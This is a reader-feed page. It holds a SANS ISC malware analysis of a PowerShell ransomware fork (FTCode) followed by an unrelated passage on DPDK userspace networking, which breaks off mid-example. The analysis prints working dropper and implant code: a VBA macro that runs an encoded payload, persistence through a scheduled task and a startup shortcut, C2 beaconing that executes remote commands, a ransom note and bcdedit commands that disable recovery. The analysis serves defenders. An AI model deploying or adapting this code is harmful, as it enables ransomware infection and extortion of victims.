The Old Reader

06 Aug 08:19

A Fork of the FTCode Powershell Ransomware, (Thu, Aug 6th)

Yesterday, I found a new malicious Powershell script that deserved to be analyzed due to the way it was dropped on the victim’s computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that it’s a file less macro. The malicious Base64 code is stored in multiples environment variables that are concatenated then executed through an IEX command:

Set osi = CreateObject("Wscript.shell")
Set wev = osi.Environment("Process")
wev("XXX0") = "JGVuY3J5cHQgPSAiNzY0OTJkMTExNjc0M2YwNDIzNDEzYjE2MDUwYTUzNDVNZ0I4QURFQVR3QXhBSElBYVFCRUFFMEFhQUJzQUZRQU1RQkxBSFF
BYUFCbEFFRUFjQUJ1QUdJQWFRQjRBSGNBUFFBOUFId0FaQUF6QURVQVlnQTJBR1VBTndBM0FERUFZUUEwQUdRQU1nQTNBR01BTmdCa0FEZ0FNZ0J
qQURjQVl3QXhBR1VBTWdBNUFEa0FNQUJtQUdRQU5BQTJBREFBTmdCaEFESUFOQUF6QUdFQU9RQmlBRElBTkFCakFHRUFNZ0JtQUdNQU1RQTNBRFl
BTXdBNUFEWUFNQUExQUdNQU9BQTJBR0lBWlFCbUFEZ0FPQUJsQURRQU9BQXhBR1FBTUFBNUFEZ0FaQUJqQURNQVlRQmxBRGdBT1FCbEFEWUFNd0J
sQURrQVl3QTNBREFBWkFBNEFEQUFNd0F4QURrQU13QmpBREFBWWdBekFETUFOd0F5QUdFQU5nQXlBRFFBTlFBeEFHVUFPQUF6QUdJQVpnQmpBR01
BWXdCaEFEQUFPUUJsQURjQU5nQTBBREFBTVFCbEFEa0FOd0F3QUdJQVl3QmtBRElBWkFBekFEZ0FNQUEzQUdZQU5RQXlBREVBWWdBNUFEQUFOd0J
oQURZQU5BQXlBRFVBTUFCbUFHRUFaQUEwQURBQU5nQTBBRElBWmdCaEFETUFNd0F4QUdJQVlRQTNBR01BTlFBeUFHVUFNZ0E1QURrQU9BQTRBR1V
BTndBMEFHWUFOQUJtQURRQU5BQTFBR1lBTXdCakFHSUFaUUEyQURnQVlnQTVBRFFBWmdCakFETUFOZ0JtQURFQVpRQXlBRE1BTUFBMEFEUUFaZ0E
1QUdRQVlnQTRBR1FBTlFBMUFHTUFZd0F4QURFQU1nQXdBRElBWVFBeUFEQUFOZ0JrQURRQU9RQTJBRElBWXdBM0FEY0FOd0JsQURrQVl3"
wev("XXX1") = "QTJBRE1BWmdCa0FHRUFaUUEwQUdJQU5BQTVBR0VBWXdBeUFHVUFPQUF5QURFQU1RQm1BREVBWkFCbEFHRUFZUUJqQURZQVlnQTBBRGtBWmdCaUF
ERUFNUUExQURjQU9RQTVBR0lBWkFCa0FEWUFNQUExQURNQVl3QTBBRE1BTXdCa0FHUUFNUUE0QUdFQVl3QmlBR1FBTkFCbUFEUUFOd0EwQURrQU5
RQXlBRElBWVFCaEFEZ0FPUUJsQURFQU5RQTNBRElBTVFBeEFEZ0FaUUJsQURrQU5BQTRBR1lBWmdBekFHRUFOUUJqQURZQU53QTFBREVBTWdBMkF
EZ0FNd0JsQUdFQU5BQmpBRE1BTUFBMEFHUUFaZ0EwQURjQU9RQXpBRE1BTVFBNEFHRUFaZ0E1QURrQU53QmlBRGNBTUFCaEFETUFNd0ExQURRQVp
BQTRBR1FBWkFBNUFHUUFOZ0F5QUdFQU1BQXdBR1FBWVFCbEFHUUFNUUF3QUdNQU53QTRBRFFBWlFBd0FEZ0FZUUF6QUdNQU9RQXdBRElBWkFBeEF
EQUFOUUEzQURRQU5RQmlBR0VBWmdCaEFHWUFPQUJqQUdFQU5nQmpBRE1BTkFCaEFEVUFOd0JsQURFQU1nQTVBR1lBWVFCbEFEWUFNd0F4QURrQVp
BQTFBR0VBTVFBMUFHSUFaQUJtQURJQU53QTRBRFVBWlFCaUFHRUFaQUJtQUdZQVl3QTRBREFBWmdBMkFHWUFaQUJsQURNQVpRQmhBRFlBTlFCaEF
EVUFaUUEyQURZQU9RQTJBRGdBWlFBMUFETUFNQUF3QURVQU1nQTRBRGtBWVFBeEFEVUFNUUE0QUdJQVlnQTRBREFBWWdCaEFHTUFaZ0EwQURrQU1
RQmlBRFFBTkFBNUFEVUFaZ0JqQURrQVlRQXlBR1lBTkFBNEFESUFOd0EzQURrQU5nQTJBRFVBWXdCbEFEQUFNUUJsQURFQU1nQmpBRGtB"

Up to 274 chunks of similar data are created and concatenated to generate the Base64 payload:

wev("XXX274") = "VGV4dElucHV0ICRlbmNyeXB0OwpoZWkgJERlY3J5cHRlZERhdGE="
XXX = "$env:XXX0+$env:XXX1+$env:XXX2+$env:XXX3+$env:XXX4+$env:XXX5+$env:XXX6+$env:XXX7+$env:XXX8+$env:XXX9+$env:XXX10+
$env:XXX11+$env:XXX12+$env:XXX13+$env:XXX14+$env:XXX15+$env:XXX16+$env:XXX17+$env:XXX18+$env:XXX19+$env:XXX20+$e
nv:XXX21+$env:XXX22+$env:XXX23+$env:XXX24+$env:XXX25+$env:XXX26+$env:XXX27+$env:XXX28+$env:XXX29+$env:XXX30+$env
:XXX31+$env:XXX32+$env:XXX33+$env:XXX34+$env:XXX35+$env:XXX36+$env:XXX37+$env:XXX38+$env:XXX39+$env:XXX40+$env:X
XX41+$env:XXX42+$env:XXX43+$env:XXX44+$env:XXX45+$env:XXX46+$env:XXX47+$env:XXX48+$env:XXX49+$env:XXX50+$env:XXX
51+$env:XXX52+$env:XXX53+$env:XXX54+$env:XXX55+$env:XXX56+$env:XXX57+$env:XXX58+$env:XXX59+$env:XXX60+$env:XXX61
+$env:XXX62+$env:XXX63+$env:XXX64+$env:XXX65+$env:XXX66+$env:XXX67+$env:XXX68+$env:XXX69+$env:XXX70+$env:XXX71+$
env:XXX72+$env:XXX73+$env:XXX74+$env:XXX75+$env:XXX76+$env:XXX77+$env:XXX78+$env:XXX79+$env:XXX80+$env:XXX81+$en
v:XXX82+$env:XXX83+$env:XXX84+$env:XXX85+$env:XXX86+$env:XXX87+$env:XXX88+$env:XXX89+$env:XXX90+$env:XXX91+$env:
XXX92"
...
osi.Run "powershell -noexit -c " & Chr(34) & "IeX ([System.Text.Encoding]::Unicode.GetString([system.Convert]::FromBase64String(" & XXX & ")));" & Chr(34), 1, True

Once the Base64 extracted and decoded, we have the first payload:

$encrypt = 
"76492d1116743f0423413b16050a5345MgB8ADEATwAxAHIAaQBEAE0AaABsAFQAMQBLAHQAaABlAEEAcABuAGIAaQB4AHcAPQA9AHwAZAAzADU
AYgA2AGUANwA3ADEAYQA0AGQAMgA3AGMANgBkADgAMgBjADcAYwAxAGUAMgA5ADkAMABmAGQANAA2ADAANgBhADIANAAzAGEAOQBiADIANABjAGE
AMgBmAGMAMQA3ADYAMwA5ADYAMAA1AGMAOAA2AGIAZQBmADgAOABlADQAOAAxAGQAMAA5ADgAZABjADMAYQBlADgAOQBlADYAMwBlADkAYwA3ADA
AZAA4ADAAMwAxADkAMwBjADAAYgAzADMANwAyAGEANgAyADQANQAxAGUAOAAzAGIAZgBjAGMAYwBhADAAOQBlADcANgA0ADAAMQBlADkANwAwAGI
AYwBkADIAZAAzADgAMAA3AGYANQAyADEAYgA5ADAANwBhADYANAAyADUAMABmAGEAZAA0ADAANgA0ADIAZgBhADMAMwAxAGIAYQA3AGMANQAyAGU
AMgA5ADkAOAA4AGUANwA0AGYANABmADQANAA1AGYAMwBjAGIAZQA2ADgAYgA5ADQAZgBjADMANgBmADEAZQAyADMAMAA0ADQAZgA5AGQAYgA4AGQ
ANQA1AGMAYwAxADEAMgAwADIAYQAyADAANgBkADQAOQA2ADIAYwA3ADcANwBlADkAYwA2ADMAZgBkAGEAZQA0AGIANAA5AGEAYwAyAGUAOAAyADE
AMQBmADEAZABlAGEAYQBjADYAYgA0ADkAZgBiADEAMQA1ADcAOQA5AGIAZABkADYAMAA1ADMAYwA0ADMAMwBkAGQAMQA4AGEAYwBiAGQANABmADQ
ANwA0ADkANQAyADIAYQBhADgAOQBlADEANQA3ADIAMQAxADgAZQBlADkANAA4AGYAZgAzAGEANQBjADYANwA1ADEAMgA2ADgAMwBlAGEANABjADM
AMAA0AGQAZgA0ADcAOQAzADMAMQA4AGEAZgA5ADkANwBiADcAMABhADMAMwA1ADQAZAA4AGQAZAA5AGQANgAyAGEAMAAwAGQAYQBlAGQAMQAwAGM
ANwA4ADQAZQAwADgAYQAzAGMAOQAwADIAZAAxADAANQA3ADQANQBiAGEAZgBhAGYAOABjAGEANgBjADMANABhADUANwBlADEAMgA5AGYAYQBlADY
AMwAxADkAZAA1AGEAMQA1AGIAZABmADIANwA4ADUAZQBiAGEAZABmAGYAYwA4ADAAZgA2AGYAZABlADMAZQBhADYANQBhADUAZQA2ADYAOQA2ADg
AZQA1ADMAMAAwADUAMgA4ADkAYQAxADUAMQA4AGIAYgA4ADAAYgBhAGMAZgA0ADkAMQBiADQANAA5ADUAZgBjADkAYQAyAGYANAA4ADIANwA3ADk
ANgA2ADUAYwBlADAAMQBlADEAMgBjADkANgAzADIAMwBlADAAYwBhAGIANgBlAGIAYQAzADIAZAA4ADEAYQA5ADUANQAwAGMANwAwADMAZABmADg
AZAA2ADQAZQA0AGYAZgBhADQAMQAxADIANQAzAGQAZAA2AGMAMwAyADEAOQA4AGMAMwBkAGIAYwAzADcAYwAxADEAYgA0AGEANAA4AGIANAA4ADA
AZAA1ADYANAA2AGMAZQAyADgAZAAzADAAOQBjADYAOABhAGMAOQA1ADEAMwBlADIAZQBiAGYAYwBlAGQANQBiAGYA..."

function hei($encrypt){
  $sipped = [system.Convert]::FromBase64String($encrypt);
  $unsipped = gdba($sipped);
  $sclipt = [System.Text.Encoding]::Unicode.GetString($unsipped);
  iex($sclipt);
}

Function Set-SecretKey {
  [CmdletBinding()]
  Param
  (
    [string]$Key
  )
  #Get key length.
  $Length = $Key.Length;  
  #Pad length.
  $Pad = 32-$Length;   
  #If the length is less than 16 or more than 32.
  If(($Length -lt 16) -or ($Length -gt 32))
  {
    #Throw exception.
    Throw "String must be between 16 and 32 characters";
  }   
  #Create a new ASCII encoding object.
  $Encoding = New-Object System.Text.ASCIIEncoding;
  #Get byte array.
  $Bytes = $Encoding.GetBytes($Key + "0" * $Pad)
  #Return byte array.
  Return $Bytes;
}
 
Function Get-EncryptedData {
  [CmdletBinding()]
  Param
  (
    $Key,
    $TextInput
  )
  #Decrypt the text input with the secret key.
  $Result = $TextInput | ConvertTo-SecureString -Key $Key | ForEach-Object {
 [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($_))};
  #Return the decrypted data.
  Return $Result;
}
 
$Key = Set-SecretKey -Key "YRTWHTRJUUYUYRKB";
$DecryptedData = Get-EncryptedData -Key $Key -TextInput $encrypt;
hei $DecryptedData

The second payload is decrypted and, again, passed to Invoke-Expression ("IEX"). We have another Base64-encoded data. Let's go deeper and decode it to discover now some VBS code. The obfuscation technique used is simple but effective:

xatu = ""
gfjbx = 0
Sub tghyu
ivhze -370
ivhze -371
ivhze -363
ivhze -381
ivhze -368
...
ivhze -450
ivhze -446
ivhze -385
ivhze -423

End Sub
Function ivhze (suas)
  xatu = xatu + ( vazey( suas + vxiwh  ) )
End Function
Function vazey (suas)
  vazey = Replace(ejtva, "aiyh,", "vizta") + ( Chr(suas) ) + ""
End Function
  ejtva = ""
  vxiwh = 482
  tghyu
  CreateObject("WScript.Shell").Run xatu, gfjbx

You can spot the trick: the next payload is decoded, via ivhze(), one character at a time and apped to the 'xatu' variable and finally executed. Here is the deobfuscated code:

powershell -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 
'JGF6YWp1emRkID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkYXphanV6ZGQpKSB7IG1kICRhemFqdXp
kZDsgfQokZHphanRhamFpID0gJGF6YWp1emRkICsgIlxXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLnZicyI7CiR5ZmZ1YWd6aXQgID0gIjEwMTQuMiI
7CiRieWFoeWpzaWIgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR0dXlidWF1eGZzICA9ICRhemFqdXpkZCArICJcdGh1bWJjYWNoZV8
2NC5kYiI7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRmYWJ4d3h1YyA9ICJ3IjsKCmZ1bmN0aW9uIGlhbXdvcmsyeyBzYyAtUGF0aCAkYnlhaHlqc2l
iIC1WYWx1ZSAkKEdldC1EYXRlKTsgfTsKZnVuY3Rpb24gY3l4anVkZyggJHR1eXlzdWJzeSApewogIGlmKCAkdHV5eXN1YnN5IC1tYXRjaCAnT3V
...
zZTsKICBpZiggJGZmc2dlaXVkeGMubGVuZ3RoIC1uZSAxNiAgKXsgJHR3Ynh2dGJ6dHYsICRmZnNnZWl1ZHhjID0gIGJiYXp4YXp1ICR0cnVlOyB
9Cn1lbHNlewogICR0d2J4dnRienR2LCAkZmZzZ2VpdWR4YyA9ICBiYmF6eGF6dSAkdHJ1ZTsKfQokbXl1cmxwb3N0ID0gd2ZheHZ6ZDsKd2hpbGU
oICRmYWJ4d3h1YyApewogIGlhbXdvcmsyOwogIHRyeXsKICAgIGlmKCAkZmFieHd4dWMgLWFuZCAoJGZhYnh3eHVjLmxlbmd0aCAtZ3QgMzApICA
pewogICAgICBpZXggJGZhYnh3eHVjOwogICAgfTsKICB9Y2F0Y2h7IGN5eGp1ZGcgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7IH07CiAgU3RhcnQtU2x
lZXAgLXMgMjgwOwogICRmYWJ4d3h1YyA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGJ5YWh5anNpYiAtRm9yY2U7Cg==' ) );iex $a;

Yes, again, a Powershell script with more Base64-encoded data! Here is the decoded script:

$azajuzdd = $env:PUBLIC + "\Libraries"
if (-not (Test-Path $azajuzdd)) { md $azajuzdd; }
$dzajtajai = $azajuzdd + "\WindowsIndexingService.vbs";
$yffuagzit  = "1014.2";
$byahyjsib = $env:temp + "\AFX50058.tmp";
$tuybuauxfs  = $azajuzdd + "\thumbcache_64.db";
$myurlpost = $false;
$fabxwxuc = "w";

function iamwork2{ sc -Path $byahyjsib -Value $(Get-Date); };
function cyxjudg( $tuyysubsy ){
  if( $tuyysubsy -match 'OutOfMemoryException' ){
    ri -Path $byahyjsib -Force;
    get-process powershell* | stop-process;
    exit;
  };
}

function sendpost2( $tuyysubsy ){
  if( !$myurlpost ){ return $false; };
  $sfyzgbw = New-Object System.Net.WebClient;
  $sfyzgbw.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
  $sfyzgbw.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  $sfyzgbw.Encoding = [System.Text.Encoding]::UTF8;
  try{
    $wabhxji = $sfyzgbw.UploadString( $myurlpost, "l="+[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( "v=$yffuagzit&guid=$twbxvtbztv&" + $tuyysubsy ) ) ) );
    $wabhxji = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $wabhxji ) );
    if( !$fabxwxuc ){ return $false; }
    if( $ffsgeiudxc -eq $wabhxji.Substring(0,16) ){
      return $wabhxji.Substring(16,$wabhxji.length-16) ;
    }else{
      $fabxwxuc = $false;
      sendpost2 ("error=" + [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $wabhxji ) ) );
    }
  }catch{
    cyxjudg $_.Exception.Message;
    $fabxwxuc = $false;
    $sfyzgbw.UploadString( $myurlpost, "l="+[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( "v=$yffuagzit&guid=$twbxvtbztv&error=sendpost2:" + $myurlpost+":"+$wabhxji +":"+ $_.Exception.Message ) ) ) );
  };
  return $false;
};

function wfaxvzd( $idtutvas ){
  $hzveitdjuj = "hxxp://cdn[.]danielrmurray[.]com/";
  "hee","xu1","hs0","jd5","mqf" | %{ $hzveitdjuj += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $hzveitdjuj.split(",") | %{
    if( !$myurlpost ){
      $myurlpost = $_;
      if( !(sendpost2 ($idtutvas + "&domen=$myurlpost" )) ){ $myurlpost = $false; };
      Start-Sleep -s 5;
    }
  };
  if( $idtutvas -match "status=register" ){
    return "ok";
  }else{
    return $myurlpost;
  } 
};

if ( Test-Path $byahyjsib ){
  if ( ( ( NEW-TIMESPAN -Start ((Get-ChildItem $byahyjsib ).CreationTime) -End (Get-Date)).Minutes ) -gt 15 ){
    ri -Path $byahyjsib -Force;
    try{ get-process powershell* | stop-process }catch{};
    exit;
  }else{ exit; };
};

function bbazxazu( $uhzghaygf ){
  if( $uhzghaygf ){
    sc -Path $tuybuauxfs -Value ( [guid]::NewGuid(), ( [guid]::NewGuid() -replace '-','' ).Substring(0,16)  -join ',' ) -Force;  
    gi $tuybuauxfs -Force |  %{ $_.Attributes = "Hidden" };
    try{
      $xbgeechhvd = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk';
      if( -not ( Test-Path $xbgeechhvd ) ){
        $awugjdzsz = New-Object -ComObject ('WScript.Shell');
        $fzxwzjvv = $awugjdzsz.CreateShortcut( $xbgeechhvd  );
        $fzxwzjvv.TargetPath = $dzajtajai;
        $fzxwzjvv.WorkingDirectory = $azajuzdd;
        $fzxwzjvv.WindowStyle = 1;
        $fzxwzjvv.Description = 'Windows Application Service';
        $fzxwzjvv.Save();
      }
    }catch{};
    $twbxvtbztv, $ffsgeiudxc = (get-content $tuybuauxfs).split(',');
    $gdigfeyf = "status=register&ssid=$ffsgeiudxc&os="+([string]$PSVersionTable.BuildVersion)+"&psver="+( ( (Get-Host).Version ).Major )+ "&comp_name=" + ((Get-WmiObject -class Win32_ComputerSystem -Property Name).Name.trim() );
    if( Test-Path ( $azajuzdd + "\thumbcache_33.db" ) ){
      ri -Path ( $azajuzdd + "\thumbcache_33.db" ), ( $azajuzdd + "\WindowsIndexingService.js" ) -Force;
      try{ schtasks.exe /delete /TN "WindowsIndexingService" /f }catch{}
      try{ schtasks.exe /delete /TN "Windows Indexing Service" /f }catch{}
      if( Test-Path ( [Environment]::GetFolderPath('Startup') + '\WindowsIndexingService.lnk' )  ){
        ri -Path ( [Environment]::GetFolderPath('Startup') + '\WindowsIndexingService.lnk' ) -Force;
      }
    }
    $wccgavfse = wfaxvzd $gdigfeyf;
    if( $wccgavfse -ne "ok"){
      ri -Path $tuybuauxfs -Force;
      exit;
    }
  }
  return (get-content $tuybuauxfs).split(',');
}
$ijhtvxyi = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR $dzajtajai); 
if ( Test-Path $tuybuauxfs ){
  $twbxvtbztv, $ffsgeiudxc =  bbazxazu $false;
  if( $ffsgeiudxc.length -ne 16  ){ $twbxvtbztv, $ffsgeiudxc =  bbazxazu $true; }
}else{
  $twbxvtbztv, $ffsgeiudxc =  bbazxazu $true;
}
$myurlpost = wfaxvzd;
while( $fabxwxuc ){
  iamwork2;
  try{
    if( $fabxwxuc -and ($fabxwxuc.length -gt 30)  ){
      iex $fabxwxuc;
    };
  }catch{ cyxjudg $_.Exception.Message; };
  Start-Sleep -s 280;
  $fabxwxuc = sendpost2;
};
ri -Path $byahyjsib -Force;

This script is stored in:

$env:PUBLIC + "\Libraries";   if (-not (Test-Path $vuzyfjvdhd)) { md $vuzyfjvdhd; }   $tcfshdx = $vuzyfjvdhd + "\WindowsIndexingService.vbs

And persistence is added through a scheduled task:

schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR $tcfshdx

After a quick analyzis, the malicious code is a ransomware. I checked deeper and found a lot of code similarities with the FTCODE ransomware[1] that was first spotted in 2013!

Here is the notice found in the Powershell code:

<h1>All your files was encrypted!</h1>
<h2  style='color:red'><b>Yes, You can Decrypt Files Encrypted!!!</b></h2>
<p>Your personal ID: <b>%guid%</b></p>
<p>1. Download Tor browser - <a href='https://www.torproject.org/download/'>https://www.torproject.org/download/</a></p>
<p>2. Install Tor browser</p>
<p>3. Open Tor Browser</p>
<p>4. Open link in TOR browser:  <b>http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=%guid%</b></p>
<p>5. Follow the instructions on this page</p>
<h2>***** Warning*****</h2>
<p>Do not rename files</p>
<p>Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)</p>
<p>As evidence, we can for free back one file</p>
<p>Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.</p>

What is different than the good old FTCODE? The extension of encrypted files is generated dynamically:

$cwteiht = ([string][guid]::NewGuid()).Substring(0,6);
...
$bcbyfiwf = $_.Name+".$cwteiht";             
try{ 
  ren -Path $($_.FullName) -NewName $bcbyfiwf -Force; 
}

Also, the malware author commented out some piece of code (why not just delete the unwanted lines?):

<#    
$tusdweaeu = uyzicich ("guid=$auiduddy&ext=$cwteiht&ek=$ifsxfwbi&r0=" + ([uri]::EscapeDataString($fsxbxad)) + "&s0=" + ([uri]::EscapeDataString($wcaebjz)) +"&");   
if( $tusdweaeu ){     
  sc -Path $yhfcdgjwz -Value $(Get-Date);   
}
else{      
  ri -Path $yhfcdgjwz -Force;     
  exit;   
}   
#>   
...
<#
xfttjicedt('bcdedit /set wxcvuhgv bootstatuspolicy ignoreallfailures');   
xfttjicedt('bcdedit /set wxcvuhgv recoveryenabled no');
#>

The initial script has still a nice VT score (4/57)![2]. The ransomware in itself is not new but the path used to deliver it was interesting.

[1] https://www.bleepingcomputer.com/news/security/ftcode-powershell-ransomware-resurfaces-in-spam-campaign/
[2] https://www.virustotal.com/gui/file/730a1230f26b06666c983eaae92577fe4c6e4a00179851e0f6b459f2e3839092/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

23 Apr 13:07

Userspace Networking with DPDK

by Rami Rosen

Userspace Networking with DPDK

Image

Rami Rosen Mon, 04/23/2018 - 07:07

Networking

kernel

Virtualization

DPDK is a fully open-source project that operates in userspace. It's a multi-vendor and multi-architecture project, and it aims at achieving high I/O performance and reaching high packet processing rates, which are some of the most important features in the networking arena. It was created by Intel in 2010 and moved to the Linux Foundation in April 2017. This move positioned it as one of the most dominant and most important open-source Linux projects. DPDK was created for the telecom/datacom infrastructure, but today, it's used almost everywhere, including the cloud, data centers, appliances, containers and more. In this article, I present a high-level overview of the project and discuss features that were released in DPDK 17.08 (August 2017).

Undoubtedly, a lot of effort in many networking projects is geared toward achieving high speed and high performance. Several factors contribute to achieving this goal with DPDK. One is that DPDK is a userspace application that bypasses the heavy layers of the Linux kernel networking stack and talks directly to the network hardware. Another factor is usage of memory hugepages. By using hugepages (of 2MB or 1GB in size), a smaller number of memory pages is needed than when using standard memory pages (which in many platforms are 4k in size). As a result, the number of Translation Lookaside Buffers (TLBs) misses is reduced significantly, and performance is increased. Yet another factor is that low-level optimizations are done in the code, some of them related to memory cache line alignment, aiming at achieving optimal cache use, prefetching and so on. (Delving into the technical details of those optimizations is outside the scope of this article.)

DPDK has gained popularity in recent years, and it's used in many open-source projects. Many Linux distributions (Fedora, Ubuntu and others) have included DPDK support in their packaging systems as well.

The core DPDK ingredients are libraries and drivers, also known as Poll Mode Drivers (PMDs). There are more than 35 libraries at the time of this writing. These libraries abstract away the low-level implementation details, which provides flexibility as each vendor implements its own low-level layers.

The DPDK Development Model

DPDK is written mostly in C, but the project also has a few tools that are written in Python. All code contributions to DPDK are done by patches sent and discussed over the dpdk-dev mailing list. Patches aiming at getting feedback first are usually titled RFCs (Request For Comments). In order to keep the code as stable as possible, the preference is to preserve the ABI (Application Binary Interface) whenever possible. When it seems that there's no other choice, developers should follow a strict ABI deprecation process, including announcement of the requested ABI changes over the dpdk-dev mailing list ahead of time. The ABI changes that are approved and merged are documented in the Release Notes. When acceptance of new features is in doubt, but the respective patches are merged into the master tree anyway, they are tagged as "EXPERIMENTAL". This means that those patches may be changed or even could be removed without prior notice. Thus, for example, new rte_bus experimental APIs were added in DPDK 17.08. I also should note that usually whenever patches for a new, generic API (which should support multiple hardware devices from different vendors) are sent over the mailing list, it's expected that at least one hardware device that supports the new feature is available on the market (if the device is merely announced and not available, developers can't test it).

There's a technical board of nine members from various companies (Intel, NXP, 6WIND, Cavium and others). Meetings typically are held every two weeks over IRC, and the minutes of those meetings are posted on the dpdk-dev mailing list.

As with other large open-source projects, there are community-driven DPDK events across the globe on a regular basis every year. First, there are various DPDK Summits. Among them, DPDK Summit Userspace is focused on being more interactive and on getting feedback from the community. There also are several DPDK meetups in different locations around the world. Moreover, from time to time there is an online community survey, announced over the dpdk-dev mailing list, in order to get feedback from the community, and everyone can participate in it.

The DPDK website hosts the master DPDK repo, but several other repos are dedicated for new features. Several tools and utilities exist in the DPDK tree, among them are the dpdk-devbind.py script, which is for associating a network device or a crypto device with DPDK, and testpmd, which is a CLI tool for various tasks, such as forwarding, monitoring statistics and more. There are almost 50 sample applications under the "examples" folder, bundled with full detailed documentation.

Apart from DPDK itself, the DPDK site hosts several other open-source projects. One is the DPDK Test Suite (DTS), which a Python-based framework for DPDK. It has more than 100 test modules for various features, including the most advanced and most recent features. It runs with IXIA and Scapy traffic generators. It includes both functional and benchmarking tests, and it's very easy to configure and run, as you need to set up only three or four configuration files. You also can set the DPDK version with which you want to run it. DTS development is handled over a dedicated mailing list, and it currently has support for Intel NICs and Mallanox NICs.

DPDK is released every three months. This release cadence is designed to allow DPDK to keep evolving in a rapid pace while giving enough opportunity to review, discuss and improve the contributions. There are usually 3–5 release candidates (RCs) before the final release. For the 17.08 release, there were 1,023 patches from 125 authors, including patches from Intel, Cavium, 6WIND, NXP and others. The release numbers follow the Ubuntu versions convention. A Long Term Stable (LTS) release is maintained for two years. Plans for future LTS releases currently are being discussed in the DPDK community. The plan is to make every .11 release in an even-numbered year (16.11, 18.11 and so forth ) an LTS release and to maintain it for two years.

Recent Features and New Ideas

Several interesting features were added last year. One of the most fascinating capabilities (added in DPDK 17.05, with new features enabled in 17.08 and 17.11) is "Dynamic Device Personalization" (DDP) for the Intel I40E driver (10Gb/25Gb/40Gb). This feature allows applying a per-device profile to the I40E firmware dynamically. You can load a profile by running a testpmd CLI command (ddp add), and you can remove it with ddp del. You also can apply or remove profiles when traffic is flowing, with a small number of packets dropped during handling a profile. These profiles are created by Intel and not by customers, as I40E firmware programming requires deep knowledge of the I40E device internals.

Other features to mention include Bruce Richardson's build system patch, which provides a more efficient build system for DPDK with meson and ninja, a new kernel module called Kernel Control Path (KCP), port representors and more.

DPDK and Networking Projects

DPDK is used in various important networking projects. The list is quite long, but I want to mention a few of them briefly:

Open vSwitch (OvS): the OvS project implements a virtual network switch. It was transitioned to the Linux Foundation in August 2016 and gained a lot of popularity in the industry. DPDK was first integrated into OvS 2.2 in 2015. Later, in OvS 2.4, support for vHost user, which is a virtual device, was added. Support for advanced features like multi-queues and numa awareness was added in subsequent releases.
Contrail vRouter: Contrail Systems was a startup that developed SDN controllers. Juniper Networks acquired it in 2012, and Juniper Networks released the Contrail vRouter later as an open-source project. It uses DPDK to achieve better network performance.
pktgen-dpdk: an open-source traffic generator based on DPDK (hosted on the DPDK site).
TREX: a stateful and stateless open-source traffic generator based on DPDK.
Vector Packet Processing (VPP): an FD.io project.

Getting Started with DPDK

For those who are newcomers to DPDK, both users and developers, there is excellent documentation hosted on DPDK site. It's recommended that you actually try run several of the sample applications (following the "Sample Applications User Guides"), starting with the "Hello World" application. It's also a good idea to follow the dpdk-users mailing list on a regular basis. For those who are interested in development, the Programmer's Guide is a good source of information about the architecture and development environment, and developers should follow the dpdk-dev mailing list as well.

DPDK and SR-IOV Example

I want to conclude this article with a very basic example (based on SR-IOV) of how to create a DPDK VF and how to attach it to a VM with qemu. I also show how to create a non-DPDK VF ("kernel VF"), attach it to a VM, run a DPDK app on that VF and communicate with it from the host.

As a preparation step, you need to enable IOMMU and virtualization on the host. To support this, add intel_iommu=on iommu=pt as kernel parameters to the kernel command line (in grub.cfg), and also to enable virtualization and VT-d in the BIOS (VT-d stands for "Intel Virtualization Technology for Directed I/O"). You'll use the Intel I40E network interface card for this example. The I40E device driver supports up to 128 VFs per device, divided equally across ports, so if you have a quad-port I40E NIC, you can create up to 32 VFs on each port.

For this example, I also show a simple usage of the testpmd CLI, as mentioned earlier. This example is based on DPDK-17.08, the most recent release of DPDK at the time of this writing. In this example, you'll use Single Root I/O Virtualization (SR-IOV), which is an extension of the PCI Express (PCIe) specification and allows sharing a single physical PCI Express resource across several virtual environments. This technology is very popular in data-center/cloud environments, and many network adapters support this feature, and likewise, their drivers support this feature. I should note that SRIOV is not limited to network devices, but is available for other PCI devices as well, such as graphic cards.

DPDK VF

You create DPDK VFs by writing the number of requested VFs into a DPDK sysfs entry called max_vfs. Say that eth8 is the PF on top of which you want to create a VF and its PCI address is 0000:07:00.0. (You can fetch the PCI address with ethtool -i | grep bus-info.) The following is the sequence you run on the host in order to create a VF and launch a VM. First, bind the PF to DPDK with usertools/dpdk-devbind.py, for example:


modprobe uio
insmod /build/kmod/igb_uio.k
./usertools/dpdk-devbind.py -b igb_uio 0000:07:00.0

Then, create two DPDK VFs with:


echo 2 > /sys/bus/pci/devices/0000:07:00.0/max_vfs

